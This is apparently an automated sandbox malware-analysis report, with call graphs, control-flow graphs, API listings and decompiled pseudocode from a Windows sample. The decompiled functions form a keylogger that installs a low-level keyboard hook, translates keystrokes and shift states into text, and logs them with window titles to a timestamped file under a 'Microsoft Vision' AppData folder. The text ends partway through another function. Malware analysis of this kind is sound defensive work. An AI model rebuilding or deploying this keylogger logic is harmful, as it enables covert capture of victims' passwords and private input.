7867 411137 7893 40d8f9 7868->7893 7871->7819 7872->7821 7873->7823 7874->7825 7875->7827 7877 40f379 7876->7877 7879 40f396 7877->7879 7899 40f39d GetTickCount 7877->7899 7879->7830 7881 4031b4 7880->7881 7882 403198 lstrlenA 7880->7882 7885 40d8cd 7881->7885 7883 405878 VirtualAlloc 7882->7883 7884 4031a8 lstrcpyA 7883->7884 7884->7881 7900 402eeb 7885->7900 7888->7843 7889->7849 7890->7855 7891->7861 7892->7867 7896 402f89 7893->7896 7897 405878 VirtualAlloc 7896->7897 7898 402486 7897->7898 7898->7810 7899->7877 7908 4058fb VirtualFree 7900->7908 7902 402ef9 7903 402f1d CreateEventA 7902->7903 7909 403138 7902->7909 7903->7841 7905 402f0b 7906 405878 VirtualAlloc 7905->7906 7907 402f12 lstrcatA 7906->7907 7907->7903 7908->7902 7910 403147 7909->7910 7911 40313d lstrlenA 7909->7911 7910->7905 7911->7905 11959 403888 11960 40f56d 9 API calls 11959->11960 11961 4038a1 11960->11961 11962 40331a 11 API calls 11961->11962 11963 4038ae 11962->11963 11964 402eeb 4 API calls 11963->11964 11965 4038b7 11964->11965 11970 4058fb VirtualFree 11965->11970 11967 4038bf 11971 4058fb VirtualFree 11967->11971 11969 4038c7 11970->11967 11971->11969 10515 40118f 10518 40fb1d 10515->10518 10525 40ddc0 CreateMutexA 10518->10525 10520 40fb32 10526 4059a9 GetProcessHeap HeapAlloc 10520->10526 10522 40fb3a 10523 4105e9 20 API calls 10522->10523 10524 401194 10522->10524 10523->10524 10525->10520 10526->10522 11983 410898 11984 401052 11983->11984 11985 4108b9 GetTempPathW lstrcatW 11984->11985 11986 4033ab 4 API calls 11985->11986 11987 4108ee 11986->11987 11988 4031fd 3 API calls 11987->11988 11989 4108f6 11988->11989 11998 4058fb VirtualFree 11989->11998 11991 4108fe 11992 403527 7 API calls 11991->11992 11993 41091c 11992->11993 11994 40343f 8 API calls 11993->11994 11995 410923 11994->11995 11996 40342b 2 API calls 11995->11996 11997 41092b 11996->11997 11998->11991 13044 40359d 13045 40f56d 9 API calls 13044->13045 13046 4035b5 13045->13046 13047 4031fd 3 API calls 13046->13047 13048 4035bf 13047->13048 13051 4058fb VirtualFree 13048->13051 13050 4035c7 13051->13050 12051 4036bd 12052 4036dd 12051->12052 12053 40f56d 9 API calls 12051->12053 12054 4031fd 3 API calls 12052->12054 12053->12052 12055 4036e7 12054->12055 12058 4058fb VirtualFree 12055->12058 12057 4036ef 12058->12057

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4074d5-4074f0 1 4074f2-4074f5 0->1 2 4074fb-407500 0->2 1->2 3 40790b-40791c CallNextHookEx 1->3 4 407506-407509 2->4 5 4075ae-4075b1 2->5 6 4075b3-4075b6 4->6 7 40750f-40751a GetAsyncKeyState 4->7 5->6 8 4075ff-407602 5->8 6->8 9 4075b8-4075f2 call 40795b GetAsyncKeyState call 407949 wsprintfW call 407966 6->9 10 407593-4075a9 wsprintfW 7->10 11 40751c-407522 7->11 12 407608 8->12 13 40771d-407724 8->13 89 4075f7-4075fa 9->89 18 407906 call 407966 10->18 11->3 15 407528 11->15 16 407713-407718 12->16 17 40760e-407611 12->17 19 4077f6-4077fd 13->19 20 40772a 13->20 22 407561-407566 15->22 23 407543-407548 15->23 24 407575-40757a 15->24 25 407557-40755c 15->25 26 407539-40753e 15->26 27 407589-40758e 15->27 28 40756b-407570 15->28 29 40754d-407552 15->29 30 40752f-407534 15->30 31 40757f-407584 15->31 16->18 35 407691-407694 17->35 36 407613 17->36 18->3 32 407890-407896 19->32 33 407803 19->33 37 407730-407736 20->37 38 4077e2-4077f4 GetAsyncKeyState 20->38 22->18 23->18 24->18 25->18 26->18 27->18 28->18 29->18 30->18 31->18 49 407898-40789b 32->49 50 4078ef-4078ff GetAsyncKeyState 32->50 45 407805-40780b 33->45 46 407879-40788b GetAsyncKeyState 33->46 41 4076e2-4076e5 35->41 42 407696 35->42 47 407615-407618 36->47 48 407687-40768c 36->48 39 407738-40773e 37->39 40 40778b-407791 37->40 43 4077b9-4077bf 38->43 51 407740-407743 39->51 52 407781-407786 39->52 59 407793-407799 40->59 60 4077d8-4077dd 40->60 57 4076e7-4076ea 41->57 58 407709-40770e 41->58 63 4076d8-4076dd 42->63 64 407698-40769b 42->64 43->18 54 407862-407874 GetAsyncKeyState 45->54 55 40780d-407810 45->55 46->43 61 40761a 47->61 62 40765b-40765e 47->62 48->18 65 4078d8-4078e5 GetAsyncKeyState 49->65 66 40789d-4078a0 49->66 50->18 56 407901 50->56 69 407745-407748 51->69 70 407777-40777c 51->70 52->18 54->43 77 407812-407815 55->77 78 40784b-40785d GetAsyncKeyState 55->78 56->18 79 4076ec-4076ef 57->79 80 4076ff-407704 57->80 58->18 72 4077c4-4077d6 GetAsyncKeyState 59->72 73 40779b-4077a1 59->73 60->18 61->52 81 407620-407623 61->81 62->60 71 407664-407668 62->71 63->18 74 40769d-4076a0 64->74 75 4076ce-4076d3 64->75 65->50 67 4078c1-4078ce GetAsyncKeyState 66->67 68 4078a2-4078bf GetKeyNameTextW 66->68 67->65 68->18 82 40774a-40774d 69->82 83 40776d-407772 69->83 70->18 84 40766a-40766d 71->84 85 40767d-407682 71->85 72->43 73->68 86 4077a7-4077b4 GetAsyncKeyState 73->86 87 4076a2-4076a5 74->87 88 4076c4-4076c9 74->88 75->18 90 407834-407846 GetAsyncKeyState 77->90 91 407817-40781a 77->91 78->43 79->68 92 4076f5-4076fa 79->92 80->18 93 407651-407656 81->93 94 407625-407628 81->94 95 407763-407768 82->95 96 40774f-407758 82->96 83->18 84->68 97 407673-407678 84->97 85->18 86->43 98 4076a7-4076aa 87->98 99 4076ba-4076bf 87->99 88->18 89->3 90->43 91->68 100 407820-407832 GetAsyncKeyState 91->100 92->18 93->18 101 407647-40764c 94->101 102 40762a-40762d 94->102 95->18 96->68 105 40775e 96->105 97->18 98->68 106 4076b0-4076b5 98->106 99->18 100->43 101->18 103 40763d-407642 102->103 104 40762f-407632 102->104 103->18 104->3 107 407638 104->107 105->3 106->18 107->68
                                      C-Code - Quality: 100%
                                      			E004074D5(signed int __ecx, int __edx, long _a4) {
                                      				signed int _v8;
                                      				int _v12;
                                      				short _v24;
                                      				short _v56;
                                      				void* _t21;
                                      				short _t24;
                                      				short _t27;
                                      				void* _t36;
                                      				int _t46;
                                      				signed int _t48;
                                      				WCHAR* _t49;
                                      				WCHAR* _t50;
                                      				long _t57;
                                      				void* _t58;
                                      				short _t59;
                                      				short _t60;
                                      				short _t62;
                                      				short _t63;
                                      				short _t64;
                                      				short _t66;
                                      				short _t67;
                                      				short _t69;
                                      				short _t70;
                                      				short _t71;
                                      				short _t73;
                                      				short _t75;
                                      				short _t77;
                                      				short _t78;
                                      				short _t79;
                                      				signed int _t81;
                                      
                                      				_t55 = __edx;
                                      				_t48 = __ecx;
                                      				_t46 = __ecx;
                                      				_v12 = __edx;
                                      				_v8 = __ecx;
                                      				_t57 = _a4;
                                      				_t21 = __edx - 0x100;
                                      				if(_t21 == 0 || _t21 == 4) {
                                      					_t58 =  *_t57;
                                      					if(_t58 < 0x27) {
                                      						__eflags = _t58 - 0x40;
                                      						if(_t58 <= 0x40) {
                                      							L21:
                                      							__eflags = _t58 - 0x66;
                                      							if(__eflags > 0) {
                                      								__eflags = _t58 - 0xbc;
                                      								if(__eflags > 0) {
                                      									__eflags = _t58 - 0xdb;
                                      									if(__eflags > 0) {
                                      										_t59 = _t58 - 0xdc;
                                      										__eflags = _t59;
                                      										if(_t59 == 0) {
                                      											_t24 = GetAsyncKeyState(0x10);
                                      											_t49 = "|";
                                      											__eflags = _t24;
                                      											if(__eflags == 0) {
                                      												_t49 = "\\"; // executed
                                      											}
                                      											L99:
                                      											E00407966(_t49, _t55, _t90); // executed
                                      											goto L100;
                                      										}
                                      										_t60 = _t59 - 1;
                                      										__eflags = _t60;
                                      										if(_t60 == 0) {
                                      											_t27 = GetAsyncKeyState(0x10);
                                      											_t50 = "}";
                                      											_t55 = "]";
                                      											L76:
                                      											__eflags = _t27;
                                      											_t49 =  ==  ? _t55 : _t50;
                                      											goto L99;
                                      										}
                                      										__eflags = _t60 - 1;
                                      										if(__eflags == 0) {
                                      											_t27 = GetAsyncKeyState(0x10);
                                      											_t50 = "\"";
                                      											_t55 = "\'";
                                      											goto L76;
                                      										}
                                      										L94:
                                      										GetKeyNameTextW((( *(_t57 + 8) << 8) +  *((intOrPtr*)(_t57 + 4)) << 0x10) + 1,  &_v56, 0xf);
                                      										_t49 =  &_v56;
                                      										goto L99;
                                      									}
                                      									if(__eflags == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "{";
                                      										_t55 = "[";
                                      										goto L76;
                                      									}
                                      									_t62 = _t58 - 0xbd;
                                      									__eflags = _t62;
                                      									if(_t62 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "_";
                                      										_t55 = "-";
                                      										goto L76;
                                      									}
                                      									_t63 = _t62 - 1;
                                      									__eflags = _t63;
                                      									if(_t63 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = ">";
                                      										_t55 = ".";
                                      										goto L76;
                                      									}
                                      									_t64 = _t63 - 1;
                                      									__eflags = _t64;
                                      									if(_t64 == 0) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = "?";
                                      										_t55 = "/";
                                      										goto L76;
                                      									}
                                      									__eflags = _t64 - 1;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "~";
                                      									_t55 = "`";
                                      									goto L76;
                                      								}
                                      								if(__eflags == 0) {
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "<";
                                      									_t55 = ",";
                                      									goto L76;
                                      								}
                                      								__eflags = _t58 - 0xa3;
                                      								if(_t58 > 0xa3) {
                                      									__eflags = _t58 - 0xa5;
                                      									if(__eflags <= 0) {
                                      										L78:
                                      										_t49 = L"[ALT]";
                                      										goto L99;
                                      									}
                                      									__eflags = _t58 - 0xba;
                                      									if(_t58 == 0xba) {
                                      										_t27 = GetAsyncKeyState(0x10);
                                      										_t50 = ":";
                                      										_t55 = ";";
                                      										goto L76;
                                      									}
                                      									__eflags = _t58 - 0xbb;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t27 = GetAsyncKeyState(0x10);
                                      									_t50 = "+";
                                      									_t55 = "=";
                                      									goto L76;
                                      								}
                                      								__eflags = _t58 - 0xa2;
                                      								if(__eflags >= 0) {
                                      									L71:
                                      									_t49 = L"[CTRL]";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x67;
                                      								if(__eflags == 0) {
                                      									_t49 = "7";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x68;
                                      								if(__eflags == 0) {
                                      									_t49 = "8";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0x69;
                                      								if(__eflags == 0) {
                                      									_t49 = "9";
                                      									goto L99;
                                      								}
                                      								__eflags = _t58 - 0xa0 - 1;
                                      								if(__eflags > 0) {
                                      									goto L94;
                                      								}
                                      								goto L100;
                                      							}
                                      							if(__eflags == 0) {
                                      								_t49 = "6";
                                      								goto L99;
                                      							}
                                      							__eflags = _t58 - 0x20;
                                      							if(__eflags > 0) {
                                      								__eflags = _t58 - 0x62;
                                      								if(__eflags > 0) {
                                      									_t66 = _t58 - 0x63;
                                      									__eflags = _t66;
                                      									if(__eflags == 0) {
                                      										_t49 = "3";
                                      										goto L99;
                                      									}
                                      									_t67 = _t66 - 1;
                                      									__eflags = _t67;
                                      									if(__eflags == 0) {
                                      										_t49 = "4";
                                      										goto L99;
                                      									}
                                      									__eflags = _t67 - 1;
                                      									if(__eflags != 0) {
                                      										goto L94;
                                      									}
                                      									_t49 = "5";
                                      									goto L99;
                                      								}
                                      								if(__eflags == 0) {
                                      									_t49 = "2";
                                      									goto L99;
                                      								}
                                      								_t69 = _t58 - 0x2d;
                                      								__eflags = _t69;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[INSERT]";
                                      									goto L99;
                                      								}
                                      								_t70 = _t69 - 1;
                                      								__eflags = _t70;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[DEL]";
                                      									goto L99;
                                      								}
                                      								_t71 = _t70 - 0x32;
                                      								__eflags = _t71;
                                      								if(__eflags == 0) {
                                      									_t49 = "0";
                                      									goto L99;
                                      								}
                                      								__eflags = _t71 - 1;
                                      								if(__eflags != 0) {
                                      									goto L94;
                                      								}
                                      								_t49 = "1";
                                      								goto L99;
                                      							}
                                      							if(__eflags == 0) {
                                      								_t49 = " ";
                                      								goto L99;
                                      							}
                                      							__eflags = _t58 - 0x11;
                                      							if(__eflags > 0) {
                                      								_t73 = _t58 - 0x12;
                                      								__eflags = _t73;
                                      								if(__eflags == 0) {
                                      									goto L78;
                                      								}
                                      								_t75 = _t73;
                                      								__eflags = _t75;
                                      								if(__eflags == 0) {
                                      									_t49 = L"[CAPS]";
                                      									goto L99;
                                      								}
                                      								__eflags = _t75 - 7;
                                      								if(__eflags != 0) {
                                      									goto L94;
                                      								}
                                      								_t49 = L"[ESC]";
                                      								goto L99;
                                      							}
                                      							if(__eflags == 0) {
                                      								goto L71;
                                      							}
                                      							_t77 = _t58 - 8;
                                      							__eflags = _t77;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[BKSP]";
                                      								goto L99;
                                      							}
                                      							_t78 = _t77 - 1;
                                      							__eflags = _t78;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[TAB]";
                                      								goto L99;
                                      							}
                                      							_t79 = _t78 - 4;
                                      							__eflags = _t79;
                                      							if(__eflags == 0) {
                                      								_t49 = L"[ENTER]\r\n";
                                      								goto L99;
                                      							}
                                      							__eflags = _t79 - 3;
                                      							if(__eflags == 0) {
                                      								goto L100;
                                      							}
                                      							goto L94;
                                      						}
                                      						L19:
                                      						__eflags = _t58 - 0x5b;
                                      						if(_t58 >= 0x5b) {
                                      							goto L21;
                                      						}
                                      						_t36 = E0040795B();
                                      						__eflags = GetAsyncKeyState(0x10);
                                      						__eflags = E00407949(_t48 & 0xffffff00 | GetAsyncKeyState(0x10) != 0x00000000, _t36);
                                      						_t53 =  !=  ? _t58 : _t58 + 0x20;
                                      						wsprintfW( &_v24, L"%c",  !=  ? _t58 : _t58 + 0x20);
                                      						E00407966( &_v24, _t36, __eflags); // executed
                                      						_t46 = _v8;
                                      						goto L100;
                                      					}
                                      					if(_t58 > 0x40) {
                                      						goto L19;
                                      					}
                                      					if(GetAsyncKeyState(0x10) == 0) {
                                      						wsprintfW( &_v24, L"%c", _t58);
                                      						_t49 =  &_v24;
                                      						goto L99;
                                      					}
                                      					_t81 = _t58 + 0xffffffd0;
                                      					_t90 = _t81 - 9;
                                      					if(_t81 > 9) {
                                      						goto L100;
                                      					}
                                      					switch( *((intOrPtr*)(_t81 * 4 +  &M00407921))) {
                                      						case 0:
                                      							_t49 = ")";
                                      							goto L99;
                                      						case 1:
                                      							__ecx = "!";
                                      							goto L99;
                                      						case 2:
                                      							__ecx = "@";
                                      							goto L99;
                                      						case 3:
                                      							__ecx = "#";
                                      							goto L99;
                                      						case 4:
                                      							__ecx = "$";
                                      							goto L99;
                                      						case 5:
                                      							__ecx = "%";
                                      							goto L99;
                                      						case 6:
                                      							__ecx = "^";
                                      							goto L99;
                                      						case 7:
                                      							__ecx = "&";
                                      							goto L99;
                                      						case 8:
                                      							__ecx = "*";
                                      							goto L99;
                                      						case 9:
                                      							__ecx = "(";
                                      							goto L99;
                                      					}
                                      				} else {
                                      					L100:
                                      					return CallNextHookEx(0, _t46, _v12, _t57);
                                      				}
                                      			}

































                                      0x004074d5
                                      0x004074d5
                                      0x004074de
                                      0x004074e1
                                      0x004074e4
                                      0x004074e8
                                      0x004074eb
                                      0x004074f0
                                      0x004074fb
                                      0x00407500
                                      0x004075ae
                                      0x004075b1
                                      0x004075ff
                                      0x004075ff
                                      0x00407602
                                      0x00407722
                                      0x00407724
                                      0x004077fb
                                      0x004077fd
                                      0x00407890
                                      0x00407890
                                      0x00407896
                                      0x004078f1
                                      0x004078f7
                                      0x004078fc
                                      0x004078ff
                                      0x00407901
                                      0x00407901
                                      0x00407906
                                      0x00407906
                                      0x00000000
                                      0x00407906
                                      0x00407898
                                      0x00407898
                                      0x0040789b
                                      0x004078da
                                      0x004078e0
                                      0x004078e5
                                      0x004077b9
                                      0x004077b9
                                      0x004077bc
                                      0x00000000
                                      0x004077bc
                                      0x0040789d
                                      0x004078a0
                                      0x004078c3
                                      0x004078c9
                                      0x004078ce
                                      0x00000000
                                      0x004078ce
                                      0x004078a2
                                      0x004078b6
                                      0x004078bc
                                      0x00000000
                                      0x004078bc
                                      0x00407803
                                      0x0040787b
                                      0x00407881
                                      0x00407886
                                      0x00000000
                                      0x00407886
                                      0x00407805
                                      0x00407805
                                      0x0040780b
                                      0x00407864
                                      0x0040786a
                                      0x0040786f
                                      0x00000000
                                      0x0040786f
                                      0x0040780d
                                      0x0040780d
                                      0x00407810
                                      0x0040784d
                                      0x00407853
                                      0x00407858
                                      0x00000000
                                      0x00407858
                                      0x00407812
                                      0x00407812
                                      0x00407815
                                      0x00407836
                                      0x0040783c
                                      0x00407841
                                      0x00000000
                                      0x00407841
                                      0x00407817
                                      0x0040781a
                                      0x00000000
                                      0x00000000
                                      0x00407822
                                      0x00407828
                                      0x0040782d
                                      0x00000000
                                      0x0040782d
                                      0x0040772a
                                      0x004077e4
                                      0x004077ea
                                      0x004077ef
                                      0x00000000
                                      0x004077ef
                                      0x00407730
                                      0x00407736
                                      0x0040778b
                                      0x00407791
                                      0x004077d8
                                      0x004077d8
                                      0x00000000
                                      0x004077d8
                                      0x00407793
                                      0x00407799
                                      0x004077c6
                                      0x004077cc
                                      0x004077d1
                                      0x00000000
                                      0x004077d1
                                      0x0040779b
                                      0x004077a1
                                      0x00000000
                                      0x00000000
                                      0x004077a9
                                      0x004077af
                                      0x004077b4
                                      0x00000000
                                      0x004077b4
                                      0x00407738
                                      0x0040773e
                                      0x00407781
                                      0x00407781
                                      0x00000000
                                      0x00407781
                                      0x00407740
                                      0x00407743
                                      0x00407777
                                      0x00000000
                                      0x00407777
                                      0x00407745
                                      0x00407748
                                      0x0040776d
                                      0x00000000
                                      0x0040776d
                                      0x0040774a
                                      0x0040774d
                                      0x00407763
                                      0x00000000
                                      0x00407763
                                      0x00407755
                                      0x00407758
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040775e
                                      0x00407608
                                      0x00407713
                                      0x00000000
                                      0x00407713
                                      0x0040760e
                                      0x00407611
                                      0x00407691
                                      0x00407694
                                      0x004076e2
                                      0x004076e2
                                      0x004076e5
                                      0x00407709
                                      0x00000000
                                      0x00407709
                                      0x004076e7
                                      0x004076e7
                                      0x004076ea
                                      0x004076ff
                                      0x00000000
                                      0x004076ff
                                      0x004076ec
                                      0x004076ef
                                      0x00000000
                                      0x00000000
                                      0x004076f5
                                      0x00000000
                                      0x004076f5
                                      0x00407696
                                      0x004076d8
                                      0x00000000
                                      0x004076d8
                                      0x00407698
                                      0x00407698
                                      0x0040769b
                                      0x004076ce
                                      0x00000000
                                      0x004076ce
                                      0x0040769d
                                      0x0040769d
                                      0x004076a0
                                      0x004076c4
                                      0x00000000
                                      0x004076c4
                                      0x004076a2
                                      0x004076a2
                                      0x004076a5
                                      0x004076ba
                                      0x00000000
                                      0x004076ba
                                      0x004076a7
                                      0x004076aa
                                      0x00000000
                                      0x00000000
                                      0x004076b0
                                      0x00000000
                                      0x004076b0
                                      0x00407613
                                      0x00407687
                                      0x00000000
                                      0x00407687
                                      0x00407615
                                      0x00407618
                                      0x0040765b
                                      0x0040765b
                                      0x0040765e
                                      0x00000000
                                      0x00000000
                                      0x00407665
                                      0x00407665
                                      0x00407668
                                      0x0040767d
                                      0x00000000
                                      0x0040767d
                                      0x0040766a
                                      0x0040766d
                                      0x00000000
                                      0x00000000
                                      0x00407673
                                      0x00000000
                                      0x00407673
                                      0x0040761a
                                      0x00000000
                                      0x00000000
                                      0x00407620
                                      0x00407620
                                      0x00407623
                                      0x00407651
                                      0x00000000
                                      0x00407651
                                      0x00407625
                                      0x00407625
                                      0x00407628
                                      0x00407647
                                      0x00000000
                                      0x00407647
                                      0x0040762a
                                      0x0040762a
                                      0x0040762d
                                      0x0040763d
                                      0x00000000
                                      0x0040763d
                                      0x0040762f
                                      0x00407632
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00407638
                                      0x004075b3
                                      0x004075b3
                                      0x004075b6
                                      0x00000000
                                      0x00000000
                                      0x004075b8
                                      0x004075c7
                                      0x004075d4
                                      0x004075dc
                                      0x004075e6
                                      0x004075f2
                                      0x004075f7
                                      0x00000000
                                      0x004075f7
                                      0x00407509
                                      0x00000000
                                      0x00000000
                                      0x0040751a
                                      0x0040759d
                                      0x004075a6
                                      0x00000000
                                      0x004075a6
                                      0x0040751c
                                      0x0040751f
                                      0x00407522
                                      0x00000000
                                      0x00000000
                                      0x00407528
                                      0x00000000
                                      0x0040752f
                                      0x00000000
                                      0x00000000
                                      0x00407539
                                      0x00000000
                                      0x00000000
                                      0x00407543
                                      0x00000000
                                      0x00000000
                                      0x0040754d
                                      0x00000000
                                      0x00000000
                                      0x00407557
                                      0x00000000
                                      0x00000000
                                      0x00407561
                                      0x00000000
                                      0x00000000
                                      0x0040756b
                                      0x00000000
                                      0x00000000
                                      0x00407575
                                      0x00000000
                                      0x00000000
                                      0x0040757f
                                      0x00000000
                                      0x00000000
                                      0x00407589
                                      0x00000000
                                      0x00000000
                                      0x0040790b
                                      0x0040790b
                                      0x0040791c
                                      0x0040791c

                                      APIs
                                      • GetAsyncKeyState.USER32 ref: 00407511
                                      • CallNextHookEx.USER32 ref: 00407912
                                        • Part of subcall function 00407966: GetForegroundWindow.USER32 ref: 0040798F
                                        • Part of subcall function 00407966: GetWindowTextW.USER32 ref: 004079A2
                                        • Part of subcall function 00407966: lstrlenW.KERNEL32(00416B88,{Unknown},?,?), ref: 00407A0B
                                        • Part of subcall function 00407966: CreateFileW.KERNEL32(02680000,00000004,00000001,00000000,00000004,00000080,00000000), ref: 00407A79
                                        • Part of subcall function 00407966: lstrlenW.KERNEL32(004127C0,00416DA0,00000000,?,?), ref: 00407AA2
                                        • Part of subcall function 00407966: WriteFile.KERNEL32(00000268,004127C0,00000000,?,?), ref: 00407AAE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWindowlstrlen$AsyncCallCreateForegroundHookNextStateTextWrite
                                      • String ID: [ALT]$[BKSP]$[CAPS]$[CTRL]$[DEL]$[ENTER]$[ESC]$[INSERT]$[TAB]
                                      • API String ID: 2452648998-4143582258
                                      • Opcode ID: d760053ecd7699525f4077e00d1313e0c3007c17875c722993cebe34cb5ab308
                                      • Instruction ID: 1e4e6ff72afcba4c5a3719967ee51c51754838019681a6ccc922eb8e763abede
                                      • Opcode Fuzzy Hash: d760053ecd7699525f4077e00d1313e0c3007c17875c722993cebe34cb5ab308
                                      • Instruction Fuzzy Hash: 4891B072E1C0099BEB2921284758AFA6511E741340F10C237DAA7B77D4D7BC7DA2A39F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 69%
                                      			E00407376(void* __eflags) {
                                      				struct _SYSTEMTIME _v24;
                                      				struct tagMSG _v52;
                                      				short _v216;
                                      				struct HINSTANCE__* _t17;
                                      				intOrPtr _t20;
                                      				intOrPtr _t23;
                                      				intOrPtr _t25;
                                      				intOrPtr _t38;
                                      				intOrPtr _t43;
                                      				void* _t44;
                                      				void* _t48;
                                      				intOrPtr _t55;
                                      				intOrPtr _t57;
                                      				intOrPtr _t59;
                                      				void* _t60;
                                      				intOrPtr* _t64;
                                      
                                      				_t17 = GetModuleHandleA(0);
                                      				_t55 =  *0x4166ac; // 0x416d98
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				asm("stosd");
                                      				E00401052(_t55 + 0x210, 0, 0x800);
                                      				_t20 =  *0x4166ac; // 0x416d98
                                      				E00401052(_t20 + 0x10, 0, 0x208);
                                      				_t23 =  *0x4166ac; // 0x416d98
                                      				__imp__SHGetFolderPathW(0, 0x1c, 0, 0, _t23 + 0x10);
                                      				_t25 =  *0x4166ac; // 0x416d98
                                      				lstrcatW(_t25 + 0x10, L"\\Microsoft Vision\\");
                                      				GetLocalTime( &_v24);
                                      				wsprintfW( &_v216, L"%02d-%02d-%02d_%02d.%02d.%02d", _v24.wDay & 0x0000ffff, _v24.wMonth & 0x0000ffff, _v24.wYear & 0x0000ffff, _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff);
                                      				_t38 =  *0x4166ac; // 0x416d98
                                      				lstrcatW(_t38 + 0x10,  &_v216);
                                      				_t57 =  *0x4166ac; // 0x416d98
                                      				_t11 = _t57 + 0x10; // 0x416da8
                                      				E004030C5(_t57 + 0xc, _t60, _t11);
                                      				_t43 =  *0x4166ac; // 0x416d98
                                      				_t12 = _t43 + 0xc; // 0x2680000, executed
                                      				_t44 = CreateFileW( *_t12, 0x10000000, 1, 0, 2, 0x80, 0);
                                      				_t59 =  *0x4166ac; // 0x416d98
                                      				 *(_t59 + 4) = _t44;
                                      				CloseHandle(_t44); // executed
                                      				SetWindowsHookExA(0xd, E004074C0, _t17, 0); // executed
                                      				_t64 = GetMessageA;
                                      				while(1) {
                                      					_t48 =  *_t64( &_v52, 0, 0, 0); // executed
                                      					if(_t48 <= 0) {
                                      						break;
                                      					}
                                      					TranslateMessage( &_v52);
                                      					DispatchMessageA( &_v52);
                                      				}
                                      				return 0;
                                      			}



















                                      0x00407384
                                      0x0040738a
                                      0x0040739d
                                      0x004073a3
                                      0x004073a4
                                      0x004073a5
                                      0x004073aa
                                      0x004073af
                                      0x004073be
                                      0x004073c3
                                      0x004073d4
                                      0x004073da
                                      0x004073ee
                                      0x004073f4
                                      0x00407424
                                      0x00407434
                                      0x0040743d
                                      0x0040743f
                                      0x00407445
                                      0x0040744c
                                      0x00407451
                                      0x00407466
                                      0x00407469
                                      0x0040746f
                                      0x00407476
                                      0x00407479
                                      0x00407488
                                      0x0040748e
                                      0x004074aa
                                      0x004074b1
                                      0x004074b5
                                      0x00000000
                                      0x00000000
                                      0x0040749a
                                      0x004074a4
                                      0x004074a4
                                      0x004074bd

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00407384
                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,00416D88), ref: 004073D4
                                      • lstrcatW.KERNEL32 ref: 004073EE
                                      • GetLocalTime.KERNEL32(?), ref: 004073F4
                                      • wsprintfW.USER32 ref: 00407424
                                      • lstrcatW.KERNEL32 ref: 0040743D
                                      • CreateFileW.KERNEL32(02680000,10000000,00000001,00000000,00000002,00000080,00000000), ref: 00407469
                                      • CloseHandle.KERNEL32(00000000), ref: 00407479
                                      • SetWindowsHookExA.USER32(0000000D,004074C0,00000000,00000000), ref: 00407488
                                      • TranslateMessage.USER32(?), ref: 0040749A
                                      • DispatchMessageA.USER32 ref: 004074A4
                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 004074B1
                                      Strings
                                      • C:\Users\user\AppData\Local\Microsoft Vision\13-01-2023_19.10.28, xrefs: 0040744B
                                      • \Microsoft Vision\, xrefs: 004073E8
                                      • %02d-%02d-%02d_%02d.%02d.%02d, xrefs: 0040741E
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleMessagelstrcat$CallbackCloseCreateDispatchDispatcherFileFolderHookLocalModulePathTimeTranslateUserWindowswsprintf
                                      • String ID: %02d-%02d-%02d_%02d.%02d.%02d$C:\Users\user\AppData\Local\Microsoft Vision\13-01-2023_19.10.28$\Microsoft Vision\
                                      • API String ID: 4117748762-4288059848
                                      • Opcode ID: 28b51c0486f4d8aca80219bee5fcc481cf51a473dbc5be7bfd11f24c0730f01a
                                      • Instruction ID: cde6b568e0b10344db86afc49b6864f67914606850f5310ef25aa5f0acf6a477
                                      • Opcode Fuzzy Hash: 28b51c0486f4d8aca80219bee5fcc481cf51a473dbc5be7bfd11f24c0730f01a
                                      • Instruction Fuzzy Hash: 4F3150B2900104BBDB509BA5DD49FEB7BBCEB48705F008426F605E2191D6B9D920CB39
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 88%
                                      			E004050CC(intOrPtr __ecx, void* __edx, void* __eflags, intOrPtr* _a4) {
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				signed int _v28;
                                      				signed int _v32;
                                      				char _v36;
                                      				char _v44;
                                      				char _v52;
                                      				char _v60;
                                      				char _v4160;
                                      				intOrPtr _t50;
                                      				void* _t53;
                                      				intOrPtr _t57;
                                      				void* _t89;
                                      				intOrPtr _t91;
                                      				void* _t117;
                                      				void* _t118;
                                      				signed int _t119;
                                      				signed int _t120;
                                      				void* _t122;
                                      				void* _t123;
                                      
